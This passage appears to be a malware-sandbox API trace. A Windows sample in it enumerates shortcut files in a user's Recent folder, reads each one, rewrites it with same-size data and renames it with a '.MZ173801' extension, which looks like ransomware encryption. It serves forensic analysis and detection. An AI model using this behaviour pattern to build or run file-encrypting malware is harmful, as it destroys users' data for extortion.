lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0107.126] GetCurrentThreadId () returned 0x1358 [0107.126] GetCurrentThreadId () returned 0x1358 [0107.126] GetCurrentThreadId () returned 0x1358 [0107.126] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aY06BCEf5o.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ay06bcef5o.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.126] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0107.126] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.126] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x441 [0107.126] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.127] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x441, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x441, lpOverlapped=0x0) returned 1 [0107.127] CloseHandle (hObject=0x3f4) returned 1 [0107.128] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aY06BCEf5o.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ay06bcef5o.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.128] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x441, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x441, lpOverlapped=0x0) returned 1 [0107.129] CloseHandle (hObject=0x3f4) returned 1 [0107.130] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aY06BCEf5o.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ay06bcef5o.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aY06BCEf5o.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ay06bcef5o.lnk.mz173801")) returned 1 [0107.131] GetCurrentThreadId () returned 0x1358 [0107.131] GetCurrentThreadId () returned 0x1358 [0107.131] GetCurrentThreadId () returned 0x1358 [0107.131] GetCurrentThreadId () returned 0x1358 [0107.131] GetCurrentThreadId () returned 0x1358 [0107.131] GetCurrentThreadId () returned 0x1358 [0107.131] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x760cdaf7, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x760cdaf7, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x760cdaf7, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x544, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="aZ5k5HRyxWcmwTH.lnk", cAlternateFileName="AZ5K5H~1.LNK")) returned 1 [0107.131] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0107.131] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0107.131] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aZ5k5HRyxWcmwTH.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\az5k5hryxwcmwth.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x760cdaf7, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x760cdaf7, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x760cdaf7, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x544)) returned 1 [0107.131] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.131] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0107.132] GetCurrentThreadId () returned 0x1358 [0107.132] GetCurrentThreadId () returned 0x1358 [0107.132] GetCurrentThreadId () returned 0x1358 [0107.132] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.132] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0107.132] GetCurrentThreadId () returned 0x1358 [0107.132] GetCurrentThreadId () returned 0x1358 [0107.132] GetCurrentThreadId () returned 0x1358 [0107.132] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aZ5k5HRyxWcmwTH.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\az5k5hryxwcmwth.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.133] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0107.133] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.133] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x544 [0107.133] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.133] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x544, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x544, lpOverlapped=0x0) returned 1 [0107.339] CloseHandle (hObject=0x3f4) returned 1 [0107.339] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aZ5k5HRyxWcmwTH.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\az5k5hryxwcmwth.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.340] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x544, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x544, lpOverlapped=0x0) returned 1 [0107.341] CloseHandle (hObject=0x3f4) returned 1 [0107.342] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aZ5k5HRyxWcmwTH.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\az5k5hryxwcmwth.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aZ5k5HRyxWcmwTH.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\az5k5hryxwcmwth.lnk.mz173801")) returned 1 [0107.342] GetCurrentThreadId () returned 0x1358 [0107.342] GetCurrentThreadId () returned 0x1358 [0107.342] GetCurrentThreadId () returned 0x1358 [0107.342] GetCurrentThreadId () returned 0x1358 [0107.342] GetCurrentThreadId () returned 0x1358 [0107.342] GetCurrentThreadId () returned 0x1358 [0107.342] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeae1d76a, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeae1d76a, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeae1d76a, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x300, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="a_IiCl.lnk", cAlternateFileName="")) returned 1 [0107.342] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0107.342] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0107.342] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\a_IiCl.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\a_iicl.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeae1d76a, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeae1d76a, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeae1d76a, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x300)) returned 1 [0107.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.343] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0107.343] GetCurrentThreadId () returned 0x1358 [0107.343] GetCurrentThreadId () returned 0x1358 [0107.343] GetCurrentThreadId () returned 0x1358 [0107.344] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 